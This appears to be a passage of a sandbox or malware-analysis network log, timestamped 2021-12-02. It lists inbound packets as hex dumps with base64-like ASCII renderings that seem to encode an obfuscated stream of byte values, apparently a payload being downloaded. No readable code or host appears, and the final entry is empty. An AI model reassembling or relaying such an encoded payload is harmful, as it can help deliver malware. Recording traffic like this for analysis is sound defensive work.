2021-12-02 17:26:37 UTC	96	IN	Data Raw: 46 4c 47 42 47 52 53 78 67 4f 44 63 73 59 45 59 78 4c 47 42 47 4e 69 78 67 4e 55 59 73 59 45 59 34 4c 47 41 33 51 69 78 67 4d 30 59 73 59 45 5a 43 4c 47 42 46 52 69 78 67 52 44 4d 73 59 44 56 47 4c 47 42 47 4f 43 78 67 4f 55 51 73 59 44 4e 47 4c 47 41 7a 4d 69 78 67 4e 45 4d 73 59 44 49 31 4c 47 42 45 51 79 78 67 4d 44 63 73 59 45 4d 31 4c 47 42 43 52 53 78 67 4e 7a 51 73 59 44 55 35 4c 47 42 44 4e 53 78 67 52 6b 49 73 59 45 59 30 4c 47 42 47 51 53 78 67 4d 55 59 73 59 45 52 42 4c 47 41 33 4f 53 78 67 52 6b 51 73 59 44 42 47 4c 47 42 44 4d 53 78 67 52 55 49 73 59 45 5a 47 4c 47 42 47 4f 53 78 67 4e 55 59 73 59 44 4d 32 4c 47 42 47 52 43 78 67 52 45 49 73 59 45 51 79 4c 47 41 33 52 69 78 67 52 54 41 73 59 44 4d 33 4c 47 42 47 51 79 78 67 4d 44 4d 73 59 45 Data Ascii: FLGBGRSxgODcsYEYxLGBGNixgNUYsYEY4LGA3QixgM0YsYEZCLGBFRixgRDMsYDVGLGBGOCxgOUQsYDNGLGAzMixgNEMsYDI1LGBEQyxgMDcsYEM1LGBCRSxgNzQsYDU5LGBDNSxgRkIsYEY0LGBGQSxgMUYsYERBLGA3OSxgRkQsYDBGLGBDMSxgRUIsYEZGLGBGOSxgNUYsYDM2LGBGRCxgREIsYEQyLGA3RixgRTAsYDM3LGBGQyxgMDMsYE
2021-12-02 17:26:37 UTC	100	IN	Data Raw: 4d 69 78 67 51 30 55 73 59 45 46 43 4c 47 42 43 52 69 78 67 4d 44 4d 73 59 44 56 46 4c 47 42 47 52 43 78 67 4d 30 51 73 59 45 5a 47 4c 47 42 44 4d 43 78 67 52 6b 59 73 59 45 5a 46 4c 47 41 33 52 69 78 67 4e 44 67 73 59 45 5a 47 4c 47 42 46 52 53 78 67 51 6b 59 73 59 45 59 32 4c 47 41 33 52 69 78 67 52 6a 67 73 59 44 67 31 4c 47 41 77 4d 53 78 67 52 44 49 73 59 44 5a 43 4c 47 41 77 4f 43 78 67 51 7a 51 73 59 45 56 47 4c 47 42 46 52 53 78 67 52 44 59 73 59 45 4e 43 4c 47 42 45 4e 69 78 67 4f 44 51 73 59 45 59 30 4c 47 41 35 52 69 78 67 52 45 45 73 59 44 63 35 4c 47 42 47 52 43 78 67 52 45 59 73 59 45 5a 45 4c 47 42 43 4d 79 78 67 52 54 67 73 59 45 59 31 4c 47 41 7a 52 69 78 67 4d 6a 55 73 59 45 59 35 4c 47 42 46 4e 53 78 67 52 6b 59 73 59 44 51 7a 4c 47 42 Data Ascii: MixgQ0UsYEFCLGBCRixgMDMsYDVFLGBGRCxgM0QsYEZGLGBDMCxgRkYsYEZFLGA3RixgNDgsYEZGLGBFRSxgQkYsYEY2LGA3RixgRjgsYDg1LGAwMSxgRDIsYDZCLGAwOCxgQzQsYEVGLGBFRSxgRDYsYENCLGBENixgODQsYEY0LGA5RixgREEsYDc5LGBGRCxgREYsYEZELGBCMyxgRTgsYEY1LGAzRixgMjUsYEY5LGBFNSxgRkYsYDQzLGB
2021-12-02 17:26:37 UTC	104	IN	Data Raw: 6b 59 73 59 45 59 31 4c 47 41 7a 51 69 78 67 52 6b 55 73 59 44 6c 43 4c 47 41 32 4f 53 78 67 51 6a 67 73 59 45 4a 47 4c 47 41 35 4d 79 78 67 4d 55 51 73 59 45 56 46 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 44 55 7a 4c 47 42 47 4e 53 78 67 4f 55 59 73 59 45 51 34 4c 47 41 33 4f 53 78 67 4e 7a 55 73 59 44 68 45 4c 47 41 31 4e 79 78 67 4e 30 59 73 59 44 6c 47 4c 47 41 7a 52 69 78 67 4e 7a 6b 73 59 45 5a 44 4c 47 41 79 4e 43 78 67 52 6b 51 73 59 44 42 45 4c 47 41 33 52 69 78 67 52 44 63 73 59 45 46 47 4c 47 41 33 52 53 78 67 52 44 63 73 59 45 45 77 4c 47 42 46 4d 79 78 67 4d 30 51 73 59 44 52 44 4c 47 42 43 4d 43 78 67 52 44 55 73 59 44 41 78 4c 47 42 47 52 69 78 67 52 44 63 73 59 44 5a 47 4c 47 42 43 4e 43 78 67 4e 44 63 73 59 44 4e 45 4c 47 42 47 52 69 78 67 Data Ascii: kYsYEY1LGAzQixgRkUsYDlCLGA2OSxgQjgsYEJGLGA5MyxgMUQsYEVFLGBERixgRkMsYDUzLGBGNSxgOUYsYEQ4LGA3OSxgNzUsYDhELGA1NyxgN0YsYDlGLGAzRixgNzksYEZDLGAyNCxgRkQsYDBELGA3RixgRDcsYEFGLGA3RSxgRDcsYEEwLGBFMyxgM0QsYDRDLGBCMCxgRDUsYDAxLGBGRixgRDcsYDZGLGBCNCxgNDcsYDNELGBGRixg
2021-12-02 17:26:37 UTC	108	IN	Data Raw: 56 47 4c 47 42 47 4e 79 78 67 52 44 63 73 59 45 52 46 4c 47 42 47 51 53 78 67 4d 45 49 73 59 45 45 35 4c 47 42 46 4d 79 78 67 51 55 51 73 59 45 4a 47 4c 47 41 34 4e 43 78 67 52 6b 55 73 59 45 59 35 4c 47 41 79 52 43 78 67 51 6a 6b 73 59 45 5a 47 4c 47 41 33 52 69 78 67 4f 54 55 73 59 45 5a 42 4c 47 42 47 52 69 78 67 52 6a 55 73 59 45 49 33 4c 47 42 44 4d 79 78 67 52 6b 55 73 59 45 56 47 4c 47 41 77 4d 53 78 67 52 45 45 73 59 45 4d 7a 4c 47 42 45 52 69 78 67 52 6b 49 73 59 45 52 47 4c 47 41 7a 4f 43 78 67 4e 45 59 73 59 44 64 47 4c 47 42 47 4d 53 78 67 4e 55 59 73 59 45 4a 46 4c 47 42 47 4e 79 78 67 4e 6b 49 73 59 44 41 33 4c 47 42 45 4d 43 78 67 52 6b 55 73 59 45 56 45 4c 47 41 31 52 69 78 67 52 6a 4d 73 59 44 4d 33 4c 47 42 47 52 69 78 67 4e 7a 55 73 59 Data Ascii: VGLGBGNyxgRDcsYERFLGBGQSxgMEIsYEE5LGBFMyxgQUQsYEJGLGA4NCxgRkUsYEY5LGAyRCxgQjksYEZGLGA3RixgOTUsYEZBLGBGRixgRjUsYEI3LGBDMyxgRkUsYEVGLGAwMSxgREEsYEMzLGBERixgRkIsYERGLGAzOCxgNEYsYDdGLGBGMSxgNUYsYEJFLGBGNyxgNkIsYDA3LGBEMCxgRkUsYEVELGA1RixgRjMsYDM3LGBGRixgNzUsY
2021-12-02 17:26:37 UTC	112	IN	Data Raw: 35 52 43 78 67 52 6b 59 73 59 44 4a 42 4c 47 41 33 51 79 78 67 51 6a 67 73 59 45 56 45 4c 47 42 45 4f 43 78 67 52 6b 49 73 59 44 45 33 4c 47 42 46 4d 79 78 67 52 55 59 73 59 45 4a 47 4c 47 41 78 4d 69 78 67 52 6b 59 73 59 44 68 44 4c 47 42 45 52 43 78 67 4f 44 63 73 59 44 4e 47 4c 47 42 44 4d 43 78 67 52 45 59 73 59 44 64 47 4c 47 41 77 4d 43 78 67 4d 44 59 73 59 45 5a 43 4c 47 42 46 51 69 78 67 4d 45 59 73 59 45 59 7a 4c 47 41 7a 51 79 78 67 51 7a 6b 73 59 45 56 45 4c 47 42 42 52 69 78 67 4f 54 63 73 59 44 41 77 4c 47 42 43 4d 79 78 67 4e 30 59 73 59 44 67 32 4c 47 41 7a 4d 43 78 67 52 6b 49 73 59 45 4a 44 4c 47 41 34 4d 79 78 67 52 44 6b 73 59 44 52 47 4c 47 41 78 4d 43 78 67 4e 6a 59 73 59 45 4a 47 4c 47 42 47 4f 53 78 67 51 55 59 73 59 45 59 7a 4c 47 Data Ascii: 5RCxgRkYsYDJBLGA3QyxgQjgsYEVELGBEOCxgRkIsYDE3LGBFMyxgRUYsYEJGLGAxMixgRkYsYDhDLGBERCxgODcsYDNGLGBDMCxgREYsYDdGLGAwMCxgMDYsYEZCLGBFQixgMEYsYEYzLGAzQyxgQzksYEVELGBBRixgOTcsYDAwLGBCMyxgN0YsYDg2LGAzMCxgRkIsYEJDLGA4MyxgRDksYDRGLGAxMCxgNjYsYEJGLGBGOSxgQUYsYEYzLG
2021-12-02 17:26:37 UTC	116	IN	Data Raw: 4e 30 59 73 59 45 51 30 4c 47 42 46 4d 79 78 67 52 54 55 73 59 44 5a 47 4c 47 42 47 4f 53 78 67 4d 55 49 73 59 45 45 31 4c 47 41 77 52 69 78 67 52 6b 55 73 59 45 5a 46 4c 47 42 45 52 69 78 67 51 6a 4d 73 59 44 52 44 4c 47 41 78 52 69 78 67 52 6b 55 73 59 45 49 7a 4c 47 41 33 52 69 78 67 52 54 63 73 59 45 52 47 4c 47 42 47 52 53 78 67 4e 54 4d 73 59 45 55 35 4c 47 42 46 4e 79 78 67 52 6b 59 73 59 45 52 42 4c 47 41 35 52 69 78 67 51 6a 41 73 59 44 4d 34 4c 47 41 7a 52 69 78 67 4e 45 59 73 59 44 64 47 4c 47 41 34 52 43 78 67 52 6a 51 73 59 45 52 47 4c 47 42 47 52 43 78 67 4f 45 51 73 59 45 51 79 4c 47 41 33 52 69 78 67 52 54 63 73 59 44 52 47 4c 47 42 47 51 69 78 67 4e 6a 63 73 59 45 46 47 4c 47 42 43 4d 79 78 67 52 6a 51 73 59 45 52 47 4c 47 42 47 52 69 78 Data Ascii: N0YsYEQ0LGBFMyxgRTUsYDZGLGBGOSxgMUIsYEE1LGAwRixgRkUsYEZFLGBERixgQjMsYDRDLGAxRixgRkUsYEIzLGA3RixgRTcsYERGLGBGRSxgNTMsYEU5LGBFNyxgRkYsYERBLGA5RixgQjAsYDM4LGAzRixgNEYsYDdGLGA4RCxgRjQsYERGLGBGRCxgOEQsYEQyLGA3RixgRTcsYDRGLGBGQixgNjcsYEFGLGBCMyxgRjQsYERGLGBGRix
2021-12-02 17:26:37 UTC	121	IN	Data Raw: 45 5a 46 4c 47 42 46 4e 43 78 67 4e 55 59 73 59 44 68 46 4c 47 42 44 52 69 78 67 4f 55 55 73 59 44 41 31 4c 47 41 35 52 69 78 67 51 7a 45 73 59 44 6c 47 4c 47 42 47 51 79 78 67 4e 30 49 73 59 45 4d 34 4c 47 41 33 52 69 78 67 51 55 59 73 59 45 5a 47 4c 47 42 45 52 53 78 67 51 6a 41 73 59 45 55 7a 4c 47 42 45 52 69 78 67 4d 30 55 73 59 45 5a 45 4c 47 41 78 52 43 78 67 4f 55 55 73 59 45 5a 47 4c 47 42 42 4e 69 78 67 4e 30 59 73 59 44 67 79 4c 47 41 33 4e 43 78 67 52 6b 4d 73 59 44 4e 43 4c 47 41 31 4d 43 78 67 51 7a 63 73 59 45 4a 47 4c 47 42 47 52 43 78 67 4e 45 59 73 59 45 5a 45 4c 47 42 46 4e 69 78 67 51 6b 59 73 59 44 41 7a 4c 47 42 46 4e 53 78 67 4e 7a 59 73 59 45 55 78 4c 47 42 46 4f 53 78 67 52 6b 59 73 59 45 51 31 4c 47 41 31 4e 79 78 67 51 30 49 73 Data Ascii: EZFLGBFNCxgNUYsYDhFLGBDRixgOUUsYDA1LGA5RixgQzEsYDlGLGBGQyxgN0IsYEM4LGA3RixgQUYsYEZGLGBERSxgQjAsYEUzLGBERixgM0UsYEZELGAxRCxgOUUsYEZGLGBBNixgN0YsYDgyLGA3NCxgRkMsYDNCLGA1MCxgQzcsYEJGLGBGRCxgNEYsYEZELGBFNixgQkYsYDAzLGBFNSxgNzYsYEUxLGBFOSxgRkYsYEQ1LGA1NyxgQ0Is
2021-12-02 17:26:37 UTC	125	IN	Data Raw: 42 47 51 53 78 67 4d 44 63 73 59 45 56 45 4c 47 42 43 4d 79 78 67 52 6a 51 73 59 45 56 47 4c 47 42 47 51 69 78 67 52 54 4d 73 59 44 64 47 4c 47 42 47 4e 53 78 67 4d 30 59 73 59 45 59 31 4c 47 41 33 51 69 78 67 52 6b 59 73 59 44 55 30 4c 47 41 31 51 53 78 67 52 6b 51 73 59 44 5a 45 4c 47 42 42 4e 79 78 67 4e 6a 55 73 59 44 64 42 4c 47 42 47 52 53 78 67 52 55 55 73 59 45 59 33 4c 47 41 7a 51 53 78 67 52 6a 67 73 59 44 64 45 4c 47 42 45 4d 69 78 67 52 6a 59 73 59 45 4e 46 4c 47 42 45 52 69 78 67 52 6b 49 73 59 45 52 43 4c 47 42 42 4e 69 78 67 51 6b 59 73 59 45 4e 43 4c 47 42 43 4d 79 78 67 52 6b 59 73 59 45 5a 43 4c 47 41 7a 4e 79 78 67 52 6b 4d 73 59 45 45 35 4c 47 42 45 52 69 78 67 4f 55 49 73 59 44 63 34 4c 47 41 79 52 69 78 67 4e 45 59 73 59 45 5a 47 4c Data Ascii: BGQSxgMDcsYEVELGBCMyxgRjQsYEVGLGBGQixgRTMsYDdGLGBGNSxgM0YsYEY1LGA3QixgRkYsYDU0LGA1QSxgRkQsYDZELGBBNyxgNjUsYDdBLGBGRSxgRUUsYEY3LGAzQSxgRjgsYDdELGBEMixgRjYsYENFLGBERixgRkIsYERCLGBBNixgQkYsYENCLGBCMyxgRkYsYEZCLGAzNyxgRkMsYEE5LGBERixgOUIsYDc4LGAyRixgNEYsYEZGL
2021-12-02 17:26:37 UTC	128	IN	Data Raw: 31 4c 47 42 47 4e 43 78 67 4e 6a 4d 73 59 44 4d 30 4c 47 42 42 4e 69 78 67 4e 55 59 73 59 45 4d 77 4c 47 41 77 4f 53 78 67 52 44 49 73 59 45 52 47 4c 47 41 7a 4d 43 78 67 52 6b 51 73 59 44 4d 33 4c 47 42 47 52 69 78 67 51 6a 49 73 59 44 4a 47 4c 47 41 31 52 69 78 67 52 6b 59 73 59 45 4d 32 4c 47 41 7a 52 69 78 67 4e 7a 59 73 59 44 6c 46 4c 47 42 47 52 53 78 67 4e 44 6b 73 59 45 4a 47 4c 47 42 46 51 53 78 67 51 30 59 73 59 45 5a 43 4c 47 42 44 52 43 78 67 4f 44 6b 73 59 44 4a 43 4c 47 41 7a 52 53 78 67 52 6b 45 73 59 44 4a 45 4c 47 42 43 52 53 78 67 52 6a 55 73 59 44 45 33 4c 47 42 47 52 69 78 67 4d 30 55 73 59 45 55 35 4c 47 42 46 52 69 78 67 52 6a 45 73 59 45 51 35 4c 47 41 33 52 69 78 67 4f 54 51 73 59 44 6b 7a 4c 47 41 30 4e 69 78 67 4d 30 45 73 59 45 Data Ascii: 1LGBGNCxgNjMsYDM0LGBBNixgNUYsYEMwLGAwOSxgRDIsYERGLGAzMCxgRkQsYDM3LGBGRixgQjIsYDJGLGA1RixgRkYsYEM2LGAzRixgNzYsYDlFLGBGRSxgNDksYEJGLGBFQSxgQ0YsYEZCLGBDRCxgODksYDJCLGAzRSxgRkEsYDJELGBCRSxgRjUsYDE3LGBGRixgM0UsYEU5LGBFRixgRjEsYEQ5LGA3RixgOTQsYDkzLGA0NixgM0EsYE
2021-12-02 17:26:37 UTC	132	IN	Data Raw: 52 69 78 67 4d 6a 6b 73 59 45 52 46 4c 47 42 47 51 69 78 67 51 7a 6b 73 59 45 52 47 4c 47 42 47 4e 53 78 67 4d 55 59 73 59 45 5a 45 4c 47 41 33 4e 79 78 67 52 44 4d 73 59 45 5a 44 4c 47 41 79 52 69 78 67 52 6b 59 73 59 44 51 31 4c 47 41 7a 52 69 78 67 52 55 51 73 59 45 4a 47 4c 47 42 47 4e 79 78 67 52 45 49 73 59 45 59 35 4c 47 41 33 4f 43 78 67 52 6b 59 73 59 44 52 46 4c 47 41 33 52 69 78 67 51 30 55 73 59 45 51 32 4c 47 42 42 52 69 78 67 4d 45 49 73 59 45 4a 44 4c 47 41 33 52 69 78 67 4d 30 51 73 59 45 4d 32 4c 47 41 35 51 69 78 67 4d 6a 49 73 59 45 45 30 4c 47 42 45 52 43 78 67 4d 45 55 73 59 44 6c 44 4c 47 41 33 52 69 78 67 4d 54 49 73 59 44 6b 35 4c 47 42 46 51 53 78 67 51 6b 59 73 59 45 55 79 4c 47 42 45 4e 79 78 67 52 6b 51 73 59 44 4a 45 4c 47 42 Data Ascii: RixgMjksYERFLGBGQixgQzksYERGLGBGNSxgMUYsYEZELGA3NyxgRDMsYEZDLGAyRixgRkYsYDQ1LGAzRixgRUQsYEJGLGBGNyxgREIsYEY5LGA3OCxgRkYsYDRFLGA3RixgQ0UsYEQ2LGBBRixgMEIsYEJDLGA3RixgM0QsYEM2LGA5QixgMjIsYEE0LGBERCxgMEUsYDlDLGA3RixgMTIsYDk5LGBFQSxgQkYsYEUyLGBENyxgRkQsYDJELGB
2021-12-02 17:26:37 UTC	136	IN	Data Raw: 6b 59 73 59 45 56 46 4c 47 42 43 52 69 78 67 52 6a 63 73 59 45 59 33 4c 47 42 47 4f 53 78 67 51 6b 51 73 59 45 4e 47 4c 47 42 45 4d 79 78 67 4e 30 59 73 59 45 56 45 4c 47 42 47 4e 79 78 67 52 6a 67 73 59 45 55 7a 4c 47 42 47 52 69 78 67 4f 54 49 73 59 45 59 30 4c 47 42 47 4e 79 78 67 52 6b 45 73 59 44 52 47 4c 47 42 47 52 53 78 67 4f 45 4d 73 59 44 64 47 4c 47 42 47 4f 43 78 67 51 54 63 73 59 45 4e 46 4c 47 42 44 52 69 78 67 4e 30 59 73 59 45 56 47 4c 47 42 47 4e 43 78 67 52 6a 63 73 59 45 5a 46 4c 47 41 79 4e 79 78 67 4d 30 55 73 59 45 5a 46 4c 47 42 42 4d 79 78 67 52 44 49 73 59 45 4d 35 4c 47 42 45 52 69 78 67 52 6a 67 73 59 44 46 43 4c 47 41 34 51 79 78 67 4e 30 59 73 59 44 6c 47 4c 47 42 47 4d 79 78 67 52 6a 51 73 59 44 68 47 4c 47 42 47 51 79 78 67 Data Ascii: kYsYEVFLGBCRixgRjcsYEY3LGBGOSxgQkQsYENGLGBEMyxgN0YsYEVELGBGNyxgRjgsYEUzLGBGRixgOTIsYEY0LGBGNyxgRkEsYDRGLGBGRSxgOEMsYDdGLGBGOCxgQTcsYENFLGBDRixgN0YsYEVGLGBGNCxgRjcsYEZFLGAyNyxgM0UsYEZFLGBBMyxgRDIsYEM5LGBERixgRjgsYDFCLGA4QyxgN0YsYDlGLGBGMyxgRjQsYDhGLGBGQyxg
2021-12-02 17:26:37 UTC	140	IN	Data Raw: 63 7a 4c 47 42 46 51 53 78 67 52 6b 55 73 59 44 52 47 4c 47 42 42 4e 69 78 67 52 45 59 73 59 44 56 43 4c 47 42 47 51 53 78 67 52 6b 59 73 59 44 4e 47 4c 47 41 30 4e 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 33 51 69 78 67 52 54 6b 73 59 45 4a 43 4c 47 42 45 52 69 78 67 4f 45 51 73 59 45 5a 46 4c 47 42 47 52 69 78 67 4e 54 63 73 59 45 5a 44 4c 47 41 31 51 53 78 67 4d 6a 49 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4d 7a 45 73 59 44 64 45 4c 47 41 33 4e 69 78 67 52 6a 41 73 59 44 63 33 4c 47 42 45 4d 43 78 67 4d 55 59 73 59 45 55 35 4c 47 41 32 4e 79 78 67 52 45 59 73 59 45 5a 45 4c 47 42 46 51 69 78 67 52 6b 55 73 59 44 68 45 4c 47 42 47 4e 43 78 67 4e 30 59 73 59 45 5a 44 4c 47 41 30 4e 79 78 67 52 6b 55 73 59 45 5a 43 4c 47 42 46 52 69 78 67 52 6a 67 73 59 Data Ascii: czLGBFQSxgRkUsYDRGLGBBNixgREYsYDVCLGBGQSxgRkYsYDNGLGA0NixgRkYsYEZGLGA3QixgRTksYEJCLGBERixgOEQsYEZFLGBGRixgNTcsYEZDLGA1QSxgMjIsYEJBLGBCRixgMzEsYDdELGA3NixgRjAsYDc3LGBEMCxgMUYsYEU5LGA2NyxgREYsYEZELGBFQixgRkUsYDhELGBGNCxgN0YsYEZDLGA0NyxgRkUsYEZCLGBFRixgRjgsY
2021-12-02 17:26:37 UTC	144	IN	Data Raw: 33 52 69 78 67 52 6a 6b 73 59 45 4a 47 4c 47 41 30 4f 53 78 67 52 55 49 73 59 45 55 31 4c 47 42 43 51 69 78 67 51 6b 59 73 59 45 4e 43 4c 47 42 46 52 69 78 67 4d 54 55 73 59 44 45 35 4c 47 42 47 4e 53 78 67 52 55 59 73 59 44 51 31 4c 47 41 35 4f 43 78 67 4d 30 51 73 59 45 45 30 4c 47 41 31 4f 53 78 67 52 6b 59 73 59 44 41 78 4c 47 41 34 4e 53 78 67 4d 54 41 73 59 45 4a 47 4c 47 41 7a 4e 53 78 67 4d 44 55 73 59 44 4a 47 4c 47 41 33 52 69 78 67 4d 7a 63 73 59 44 59 78 4c 47 42 47 52 43 78 67 4f 54 4d 73 59 44 67 30 4c 47 42 46 4d 53 78 67 4d 30 59 73 59 44 51 32 4c 47 42 43 52 69 78 67 52 6b 59 73 59 44 41 78 4c 47 42 42 4e 43 78 67 4e 30 4d 73 59 44 5a 43 4c 47 41 30 4d 69 78 67 52 55 51 73 59 44 56 47 4c 47 41 79 4d 43 78 67 4e 6b 4d 73 59 45 5a 47 4c 47 Data Ascii: 3RixgRjksYEJGLGA0OSxgRUIsYEU1LGBCQixgQkYsYENCLGBFRixgMTUsYDE5LGBGNSxgRUYsYDQ1LGA5OCxgM0QsYEE0LGA1OSxgRkYsYDAxLGA4NSxgMTAsYEJGLGAzNSxgMDUsYDJGLGA3RixgMzcsYDYxLGBGRCxgOTMsYDg0LGBFMSxgM0YsYDQ2LGBCRixgRkYsYDAxLGBBNCxgN0MsYDZCLGA0MixgRUQsYDVGLGAyMCxgNkMsYEZGLG
2021-12-02 17:26:37 UTC	148	IN	Data Raw: 4f 44 45 73 59 44 4d 33 4c 47 42 47 52 69 78 67 52 6a 51 73 59 44 64 47 4c 47 42 42 52 53 78 67 52 6b 51 73 59 44 41 33 4c 47 42 45 4d 69 78 67 52 45 51 73 59 44 56 47 4c 47 42 47 51 79 78 67 51 55 59 73 59 44 46 44 4c 47 42 47 51 69 78 67 4e 6b 59 73 59 44 46 46 4c 47 42 47 51 79 78 67 52 54 59 73 59 44 4e 43 4c 47 41 35 51 53 78 67 51 30 45 73 59 45 45 79 4c 47 41 7a 4e 79 78 67 4d 45 59 73 59 44 64 46 4c 47 42 42 51 53 78 67 52 6b 55 73 59 44 4e 45 4c 47 41 7a 51 53 78 67 4e 6b 59 73 59 45 5a 46 4c 47 41 78 4d 79 78 67 51 7a 67 73 59 44 59 31 4c 47 42 47 52 43 78 67 51 7a 51 73 59 45 45 7a 4c 47 41 31 52 69 78 67 52 6a 41 73 59 44 42 47 4c 47 42 42 4e 53 78 67 52 45 49 73 59 44 46 47 4c 47 41 33 52 43 78 67 52 6b 55 73 59 45 4e 43 4c 47 42 47 51 79 78 Data Ascii: ODEsYDM3LGBGRixgRjQsYDdGLGBBRSxgRkQsYDA3LGBEMixgREQsYDVGLGBGQyxgQUYsYDFDLGBGQixgNkYsYDFFLGBGQyxgRTYsYDNCLGA5QSxgQ0EsYEEyLGAzNyxgMEYsYDdFLGBBQSxgRkUsYDNELGAzQSxgNkYsYEZFLGAxMyxgQzgsYDY1LGBGRCxgQzQsYEEzLGA1RixgRjAsYDBGLGBBNSxgREIsYDFGLGA3RCxgRkUsYENCLGBGQyx
2021-12-02 17:26:37 UTC	153	IN	Data Raw: 44 46 44 4c 47 41 31 52 53 78 67 52 6b 51 73 59 45 52 47 4c 47 42 46 52 53 78 67 52 6b 59 73 59 45 49 7a 4c 47 42 47 52 69 78 67 4e 6a 63 73 59 45 5a 42 4c 47 42 42 52 69 78 67 4d 55 55 73 59 45 5a 47 4c 47 42 45 52 53 78 67 51 7a 45 73 59 45 4d 79 4c 47 42 45 52 43 78 67 52 6b 55 73 59 44 5a 47 4c 47 42 43 52 53 78 67 52 6a 4d 73 59 45 52 43 4c 47 41 31 51 53 78 67 52 44 6b 73 59 45 52 46 4c 47 42 47 52 69 78 67 51 54 6b 73 59 45 5a 42 4c 47 41 33 51 69 78 67 4f 55 51 73 59 44 4d 33 4c 47 41 31 52 69 78 67 52 54 45 73 59 45 4e 45 4c 47 41 35 4d 79 78 67 52 6b 59 73 59 45 56 43 4c 47 41 7a 52 69 78 67 52 6b 45 73 59 44 51 33 4c 47 42 45 4d 79 78 67 52 45 59 73 59 45 55 31 4c 47 41 35 52 69 78 67 52 6b 49 73 59 44 6c 43 4c 47 41 7a 52 53 78 67 52 6a 63 73 Data Ascii: DFDLGA1RSxgRkQsYERGLGBFRSxgRkYsYEIzLGBGRixgNjcsYEZBLGBBRixgMUUsYEZGLGBERSxgQzEsYEMyLGBERCxgRkUsYDZGLGBCRSxgRjMsYERCLGA1QSxgRDksYERFLGBGRixgQTksYEZBLGA3QixgOUQsYDM3LGA1RixgRTEsYENELGA5MyxgRkYsYEVCLGAzRixgRkEsYDQ3LGBEMyxgREYsYEU1LGA5RixgRkIsYDlCLGAzRSxgRjcs
2021-12-02 17:26:37 UTC	157	IN	Data Raw: 42 47 52 53 78 67 52 54 49 73 59 45 52 47 4c 47 42 46 4d 69 78 67 52 44 63 73 59 45 5a 46 4c 47 42 43 52 69 78 67 4e 30 55 73 59 45 56 43 4c 47 42 45 52 69 78 67 4e 45 4d 73 59 44 59 32 4c 47 42 47 4e 43 78 67 4d 54 63 73 59 44 6b 7a 4c 47 42 46 4e 69 78 67 52 55 55 73 59 45 4a 44 4c 47 42 47 4f 43 78 67 51 55 59 73 59 45 5a 44 4c 47 41 34 52 69 78 67 52 6a 51 73 59 45 55 79 4c 47 42 47 52 69 78 67 4e 7a 51 73 59 44 63 35 4c 47 42 47 52 53 78 67 4e 7a 63 73 59 45 45 32 4c 47 42 43 52 69 78 67 51 30 51 73 59 44 56 47 4c 47 42 47 51 69 78 67 51 55 59 73 59 44 41 30 4c 47 42 42 4d 53 78 67 52 44 4d 73 59 44 49 31 4c 47 41 34 4d 69 78 67 51 55 51 73 59 44 52 43 4c 47 42 45 4d 69 78 67 52 44 67 73 59 44 6c 45 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 49 79 4c Data Ascii: BGRSxgRTIsYERGLGBFMixgRDcsYEZFLGBCRixgN0UsYEVCLGBERixgNEMsYDY2LGBGNCxgMTcsYDkzLGBFNixgRUUsYEJDLGBGOCxgQUYsYEZDLGA4RixgRjQsYEUyLGBGRixgNzQsYDc5LGBGRSxgNzcsYEE2LGBCRixgQ0QsYDVGLGBGQixgQUYsYDA0LGBBMSxgRDMsYDI1LGA4MixgQUQsYDRCLGBEMixgRDgsYDlELGAzNyxgRkUsYDIyL
2021-12-02 17:26:37 UTC	160	IN	Data Raw: 47 4c 47 42 45 52 69 78 67 52 6b 59 73 59 44 49 32 4c 47 41 35 4e 43 78 67 4d 54 49 73 59 45 5a 42 4c 47 41 32 52 69 78 67 4e 6a 6b 73 59 44 4e 44 4c 47 42 43 52 69 78 67 4d 6a 63 73 59 45 5a 45 4c 47 42 47 52 43 78 67 4d 6a 55 73 59 45 5a 45 4c 47 41 35 52 43 78 67 52 44 4d 73 59 44 45 34 4c 47 42 47 52 53 78 67 4e 7a 51 73 59 44 67 79 4c 47 42 47 4e 53 78 67 4d 55 49 73 59 44 55 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 79 4c 47 42 43 4e 53 78 67 52 6b 51 73 59 44 6c 47 4c 47 42 42 4f 53 78 67 51 55 59 73 59 45 52 47 4c 47 41 35 4f 53 78 67 52 6a 41 73 59 45 5a 43 4c 47 41 32 4f 53 78 67 51 7a 49 73 59 45 55 7a 4c 47 41 30 52 69 78 67 4d 6a 63 73 59 45 51 34 4c 47 41 33 52 69 78 67 4d 6a 67 73 59 45 59 31 4c 47 42 47 4f 53 78 67 4f 54 51 73 59 45 Data Ascii: GLGBERixgRkYsYDI2LGA5NCxgMTIsYEZBLGA2RixgNjksYDNDLGBCRixgMjcsYEZELGBGRCxgMjUsYEZELGA5RCxgRDMsYDE4LGBGRSxgNzQsYDgyLGBGNSxgMUIsYDUwLGBGRixgRkYsYDAyLGBCNSxgRkQsYDlGLGBBOSxgQUYsYERGLGA5OSxgRjAsYEZCLGA2OSxgQzIsYEUzLGA0RixgMjcsYEQ4LGA3RixgMjgsYEY1LGBGOSxgOTQsYE
2021-12-02 17:26:37 UTC	164	IN	Data Raw: 4d 53 78 67 52 6a 45 73 59 44 67 33 4c 47 42 47 52 69 78 67 52 44 51 73 59 44 5a 47 4c 47 42 47 52 53 78 67 4e 44 63 73 59 44 59 30 4c 47 41 77 4e 79 78 67 4e 30 59 73 59 44 45 79 4c 47 41 33 4d 69 78 67 4e 44 63 73 59 45 4d 33 4c 47 42 47 52 69 78 67 52 44 59 73 59 44 64 47 4c 47 42 47 4f 43 78 67 4f 54 4d 73 59 45 55 35 4c 47 42 47 52 69 78 67 4e 7a 67 73 59 45 59 33 4c 47 42 47 52 69 78 67 52 6b 45 73 59 44 55 33 4c 47 41 33 51 79 78 67 51 54 51 73 59 45 5a 47 4c 47 42 43 4e 43 78 67 4e 55 59 73 59 44 6c 42 4c 47 42 44 4f 43 78 67 4e 6b 4d 73 59 45 5a 46 4c 47 42 47 4e 69 78 67 51 6b 59 73 59 45 59 33 4c 47 41 32 52 69 78 67 52 6b 59 73 59 44 64 43 4c 47 41 32 52 69 78 67 52 6b 51 73 59 45 52 42 4c 47 41 31 4d 43 78 67 4e 44 45 73 59 45 4a 47 4c 47 41 Data Ascii: 